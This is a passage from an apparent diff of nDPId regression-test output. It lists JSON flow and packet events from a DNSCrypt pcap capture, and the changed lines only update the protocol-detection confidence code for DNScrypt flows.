AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":53045,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":53045,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":34024,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":946739402188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAAXc1vUgAH4RHSMKAAABF29KzYToAbsGBA8bS8IBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":34024,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":34024,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":577,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739402188} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":577,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAABQ1vYAuX4RQfUKAAABF29KzQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":578,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739402188} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":578,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAABQ1vUAuX4RQfYKAAABF29KzQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":579,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":946739402188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAAXc1vcgAH4RHSEKAAABF29KzerRAbsGBKkvS8QBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60113,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60113,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":580,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739402188} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":580,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAABQ1vcAuX4RQfQKAAABF29KzQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":946739402352,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739402352,"pkt":"ZmZmZmZmRERERERECABFAADUpqhAADURe3gXb0rNCgAAAQG76MMAwNUkS8OBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADFMi1FdTWI6xs9AIHJqo\/A+wDfjlj3WkVYnoIQAvOP3ISfoMelOBqvsYElaECIkBkM1KRmWo7IwtwzQE5GK6ICxIfEdneiwuXVbSuJIibtWiAHFQr52HeEOQNDYtX2pkLEh8R2d6LC5QAAAAFfU1VGX1Smxg=="} @@ -1178,292 +1178,292 @@ 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739611961,"flow_last_seen":946739611961,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47545,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01235{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":946739611961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739611961,"pkt":"REREREREZmZmZmZmCABFAAJcJkxAAKYRdegKAAABl1DeT7m5AbsCSDi2hxVktS2XlAXK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDO6Ugg3iONmSyzFBmv3WeUbwZp9IYiTM191d4EGpSNgn1Vnmhi0dnshrsldty0p0rog9vCUpw6jzc4+P9Puw1SQZaVq6AQHs9j8FHA6TV2fEODI+IleWgpNwN7RkTyReTtbcAyqcw4LZqRdzr4SFPlNOAV9QpavHsXRRYeP7A8ijLspxo8F1YH1toI16qO3Wyz3w2HsVy3nP0JwlulITaJBD9qG3whIbZyqhQYyJ2BvR67IS++x+jXq0MGJud5+s9l28XPdTs\/vK3y+tQd2+A5CezpWRNwOoTnzQrdnO5idkwCcFNbHZKDQFROmtVXAPisaIFuh2zDBTP9EootPFJMHtt5MCwQKxsqxAokmytyeHxjFqA8WwfVcAi5mF\/ZuGsfcjSKloXW082oaEMVSIkwJ74\/Jb+rJZiHxMq58YuihNtogJ1XyZ7N5w9vgrIru3Mf+Yb1s51E\/BAtAVet5JOSYKjHsRrwqjR5SM92Qhm81hCxh\/GAZd8BGwMYGW43YzzX7cWwZTJxpff01gK7OvmzthL7xQA0ARPjY6jfbbFZeg4DdbEVEZyuWoK3KXb6sDjKwxJLrncbQshDJtGHzwOzijM3V5WnhnWXGriaawdzvTvZzhIQ0srq9F4tmvJ8cwU537l2ggbdtCOlpHKYsSA7i9H4MB3lIBKJSrAhjGcr6R+mT\/OaHMOBRDayFlbn\/EG+N1\/YwEFto6"} 00957{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":946739612032,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":410,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":410,"pkt_l4_len":376,"thread_ts_msec":946739612032,"pkt":"ZmZmZmZmRERERERECABFAAGMXAxAADQRsviXUN5PCgAAAQG7ubkBeOzQcjZmbnZXajjulIIN4jjZkssxQZqSDAUmKpfd49BFPcXUJNsH1tfF8ILOrmEInURZhClsi8Vfa6egoR1ZaEP2TFIvnnwmg3DMIMPj1X93gFJnlICV6s1bYKcQ0IVszmSovV29MoXsJXRtqoBvjWoL6erf64n\/9lY7Pizn5GAIJ+ZpdKmiKxdjxBHa0Bf9zJfNMagz21JNImGKGgrF3C+muN5QaVzi53jM6qhgKER\/YzujMJfiHF\/aaLCV7ensBtZtMGPEX2NyQDksoYgHkNVty+uHcb5FWtodWfWQwK\/pSx8\/6EDGrCYsD3hCk628LO83kEMpLh3mWe\/DOYJ4VpTxZ8unmS83bK0xOwnj+LV6NHmYBoNZVrz1zkXkqx7GlUurn5Yj1XRRPDFjXpVJqBkZG7vuwQAAc0Zs2zwVPvHOdh3jfX9L6TmayQGceJ8L7zIXqi14xI3xt4P62MSxtYdyqx5X5yN0e0crNQn80yUKKZ8="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739611961,"flow_last_seen":946739612032,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":944,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":946739612032,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47545,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739611961,"flow_last_seen":946739612032,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":944,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":946739612032,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47545,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739614386,"flow_last_seen":946739614386,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739614386,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":38660,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01236{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":946739614386,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739614386,"pkt":"REREREREZmZmZmZmCABFAAJc989AAKYRHsYKAAABkFtq45cEAbsCSL5UGz3LRoQYGq7K1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDCN0sI1afsDgB7g4z3waLSDC2o9apEHGrmX1\/\/XVDTnA82XGV5BkJ6hyx9SwD+WiC6uDTp6AbKbCDGnUn3j+tLJpn2hItHoTa\/xeDArjby7slJF40ySc4tPuE+UMiXypOsTanLuynVvS9n8gbILRPI43brHHY7HDFenFZDOtfB+JxdnOOFNDYhfJprBR2DTCXiO3N4Bex+NG0pKxAEiN254J3qeD3\/OAwnKA81+nREhgnE+6I0CyIA201vB4x+d\/+mhwpFUuUhbbD\/SfJPnQXjy3jOXtIJLaIFLNycvxG+PS5Ojxq9uCtE2XhA4tfk90STkQEJNACVZbLwRyAcYZfg9qxeV8twgsNlEDF5PIG3nzQvpvywuTYlFQryvjTvIH4VR9wK25AyfzR7C\/t+iRavrUqnzmU\/fAOG0CvTaSqHI+4MnbhUZVoxS2UyUFdELJqReTeLin8fcrvX1wJgCVSp8+cPs7vBKaV+JiLAgU+OxuxldboVrer9459FyQl4WFjHazGEL4xKqJvMIvrueodNiqXGE6cS6tIYUKgaQ4AFmKHlACJF\/olwP9NoAOKSUY3Y66DFQ4v+LM9mU+SWhao2muTb4Tju4w6ERuBOUyzP9LBhYeQUMfKmBYpIb+UNg41n6P7vyU8kDamY+f+xv4B8HSDYKX2DWu9KXaFSPBiu3SXVmscc3+ivcw18HJ9BS2CgGcv+eo7Dnd"} 00780{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":2,"flow_last_seen":946739614411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":946739614411,"pkt":"ZmZmZmZmRERERERECABFAAEMVHFAADcRMnWQW2rjCgAAAQG7lwQA+NqDcjZmbnZXajgjdLCNWn7A4Ae4OM+V95TEH+wEPWjCUqAPqLgKz03zsgxbeQD\/5ecQsA4RfRBRViLb9egczysjt1OolDW9kDXjXmmQiF571kS9rCn31TE60wfdQuvLsxXdWOqgaclRBMIB2+xIEcqZiOOnbAC3owgMpf07BM+8qosYU+1EzXz7EouWJa8VxL5FW0SNfmJsYYBjcSkC0myJwAMFESyFpxNCQtb+Z3Q2X9FOvOphUjS1Bh6POqoHGB4CgchAKjQ4X8fxQb5Wv65jhpmBRnmn5yUbcKZT8A2zfL7KGiy9Vrk+mU3WwB6UiVmU"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739614386,"flow_last_seen":946739614411,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739614411,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":38660,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 